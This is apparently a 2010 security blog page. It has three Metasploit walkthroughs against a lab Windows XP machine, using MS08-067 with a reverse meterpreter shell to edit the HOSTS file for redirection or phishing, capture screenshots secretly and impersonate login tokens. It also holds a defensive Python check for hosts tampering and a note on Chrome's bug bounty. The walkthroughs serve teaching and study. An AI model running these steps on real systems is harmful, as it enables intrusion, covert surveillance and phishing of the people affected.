NMAP 5 Cheatsheet
February 23, 2010 – 7:31 PM
Here’s a nice little cheatsheet for NMAP 5 making its rounds today on the internet:
http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf
Very handy.
This is just a quick example of how easily you can modify the HOSTS file on a compromised Windows system using the meterpreter script called hostsedit. As always, we start off with a basic exploit to gain a meterpreter session back from the victim’s machine:
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set rhost 10.6.18.104
rhost => 10.6.18.104
msf exploit(ms08_067_netapi) > set lhost 10.6.18.100
lhost => 10.6.18.100
msf exploit(ms08_067_netapi) > exploit
[*] Handler trying to bind to 10.6.18.100
[*] Started reverse handler on port 4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability…
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.6.18.100:4444 -> 10.6.18.104:1085)
meterpreter >
Now we are just going to run the hostsedit meterpreter script, look at the options, and modify the HOSTS file:
meterpreter > run hostsedit -h
This Meterpreter script is for adding entries in to the Windows Hosts file.
Since Windows will check first the Hosts file instead of the configured DNS Server
it will assist in diverting traffic to the fake entry or entries. Either a single
entry can be provided or a series of entries provided a file with one per line.
OPTIONS:
-e Host entry in the format of IP,Hostname.
-h Help Options.
-l Text file with list of entries in the format of IP,Hostname. One per line.
Example:
run hostsedit -e 127.0.0.1,google.com
run hostsedit -l /tmp/fakednsentries.txt
meterpreter > run hostsedit -e 127.0.0.1,www.google.com
[*] Making Backup of the hosts file.
[*] Backup loacated in C:\WINDOWS\System32\drivers\etc\hosts82257.back
[*] Adding Record for Host www.google.com with IP 127.0.0.1
[*] Clearing the DNS Cache
meterpreter >
Looks like it was successful. Let’s see:
Worked like a charm. Of course you can do many other things than just pipe www.google.com to localhost. (set up an evil web server lately?? simple phishing site??)
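A defender-side check for what this script leaves behind, as an added example that is not part of the original post or of the hostsedit script: it parses a hosts file, flags names pinned to loopback (like the www.google.com line above) and looks for the hosts<digits>.back backup that hostsedit writes next to the hosts file. The etc path comes from the output above; the sample file content is constructed.

```python
import ipaddress
import re
from pathlib import Path

# Constructed sample of a hosts file after the hostsedit run above (localhost + injected line).
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
127.0.0.1 www.google.com
"""

BACKUP_RE = re.compile(r"^hosts\d+\.back$", re.IGNORECASE)
ALLOWED_LOCAL = {"localhost", "localhost.localdomain"}

def parse_hosts(text):
    """(ip, hostname) pairs from hosts-file text; comments and blank lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        ip, *names = line.split()
        entries.extend((ip, name.lower()) for name in names)
    return entries

def suspicious_entries(entries):
    """Flag non-localhost names pinned to loopback/unspecified or unparseable addresses."""
    flagged = []
    for ip, name in entries:
        if name in ALLOWED_LOCAL:
            continue
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            flagged.append((ip, name, "unparseable address"))
            continue
        if addr.is_loopback or addr.is_unspecified:
            flagged.append((ip, name, "pinned to loopback/unspecified"))
    return flagged

def backup_artifacts(filenames):
    """Leftover hostsedit backups (hosts<digits>.back) in a listing of the etc directory."""
    return sorted(n for n in filenames if BACKUP_RE.match(n))

def audit_etc_dir(etc_dir=r"C:\WINDOWS\System32\drivers\etc"):
    """Audit a live etc directory; returns (flagged entries, backup artifacts)."""
    etc = Path(etc_dir)
    entries = parse_hosts((etc / "hosts").read_text(errors="replace"))
    return suspicious_entries(entries), backup_artifacts(p.name for p in etc.iterdir())
```

Since the hosts file is consulted before DNS, any entry this flags silently redirects or sinkholes that name for the whole system.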
Here’s a quick example of grabbing a screenshot of a compromised system using meterpreter’s espia module. Start with a basic exploit to gain a meterpreter session. You’ll need to make sure you migrate to a process that has access to Active Desktop or else you will get nothing but blank images:
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > set rhost 10.6.18.104
rhost => 10.6.18.104
msf exploit(ms08_067_netapi) > set lhost 10.6.18.100
lhost => 10.6.18.100
msf exploit(ms08_067_netapi) > exploit
[*] Handler trying to bind to 10.6.18.100
[*] Started reverse handler on port 4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability…
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.6.18.100:4444 -> 10.6.18.104:1100)
meterpreter > ps
Process list
============
PID Name Arch User Path
— —- —- —- —-
0 [System Process]
4 System x86 NT AUTHORITY\SYSTEM
384 smss.exe x86 NT AUTHORITY\SYSTEM \SystemRoot\System32\smss.exe
524 csrss.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\csrss.exe
556 winlogon.exe x86 NT AUTHORITY\SYSTEM \??\C:\WINDOWS\system32\winlogon.exe
692 services.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\services.exe
704 lsass.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\lsass.exe
876 VBoxService.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\VBoxService.exe
904 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\svchost.exe
972 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1064 svchost.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\System32\svchost.exe
1124 svchost.exe x86 NT AUTHORITY\NETWORK SERVICE C:\WINDOWS\system32\svchost.exe
1192 svchost.exe x86 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\system32\svchost.exe
1452 spoolsv.exe x86 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\spoolsv.exe
284 explorer.exe x86 VM-WINXP\Troy C:\WINDOWS\Explorer.EXE
624 VBoxTray.exe x86 VM-WINXP\Troy C:\WINDOWS\system32\VBoxTray.exe
632 ctfmon.exe x86 VM-WINXP\Troy C:\WINDOWS\system32\ctfmon.exe
656 alg.exe x86 NT AUTHORITY\LOCAL SERVICE C:\WINDOWS\System32\alg.exe
1252 wscntfy.exe x86 VM-WINXP\Troy C:\WINDOWS\system32\wscntfy.exe
1940 firefox.exe x86 VM-WINXP\Troy C:\Program Files\Mozilla Firefox\firefox.exe
meterpreter > migrate 284
[*] Migrating to 284…
[*] Migration completed successfully.
meterpreter >
Now we load the espia module and view the victim’s live desktop:
meterpreter > use espia
Loading extension espia…success.
meterpreter > screenshot -h
Usage: screenshot <path.bmp> [view in browser: true|false]
meterpreter > screenshot /tmp/victim.bmp
[*] Image saved to /tmp/victim.bmp
meterpreter >
The image should open automatically and display on your screen:
That’s it. You are now viewing the victim’s desktop without them even knowing you are there.
I just wanted to show a quick example of using Incognito to impersonate user tokens on a compromised system. You can think of a token as something like a web “cookie”: an object that holds your security information for the whole login session so that you don’t have to re-authenticate to the system or network each time you want to access another object. You can read more about tokens here: http://en.wikipedia.org/wiki/Token_(Windows_NT_architecture)
On this particular machine, “Troy” is an Admin account.
(without all the screenshots – sorry dial-up users)
We’ll start off by launching Metasploit and exploiting the system. For this we need to make sure the payload returns a meterpreter session back to us:
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
—- ————— ——– ———–
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
—- ————— ——– ———–
EXITFUNC thread yes Exit technique: seh, thread, process
LHOST yes The local address
LPORT 4444 yes The local port
Exploit target:
Id Name
— —-
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set rhost 10.6.18.104
rhost => 10.6.18.104
msf exploit(ms08_067_netapi) > set lhost 10.6.18.100
lhost => 10.6.18.100
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on port 4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Triggering the vulnerability…
[*] Sending stage (725504 bytes)
[*] Meterpreter session 1 opened (10.6.18.100:4444 -> 10.6.18.104:1089)
meterpreter >
Once we have a meterpreter session we can launch the Incognito module, list the available tokens and impersonate the one we want:
Complete success without having to crack passwords or “pass the hash”.
Google has recently launched an “experimental new incentive” that rewards security researchers for bugs they report in the Chrome browser (all versions – stable, beta, and dev) or in the open source Chromium project itself. Their base reward is identical to Mozilla’s at $500, but they are offering a higher reward of $1337 for “particularly severe or particularly clever” bugs/vulnerabilities.
I personally like this and I hope a lot of researchers step up and claim the rewards. The more bugs that get reported responsibly, the more secure the users of the Chrome browser will be. Coupled with the major built-in security features already in place, this could very well put Chrome on top of the browser market.
Source:
http://blog.chromium.org/2010/01/encouraging-more-chromium-security.html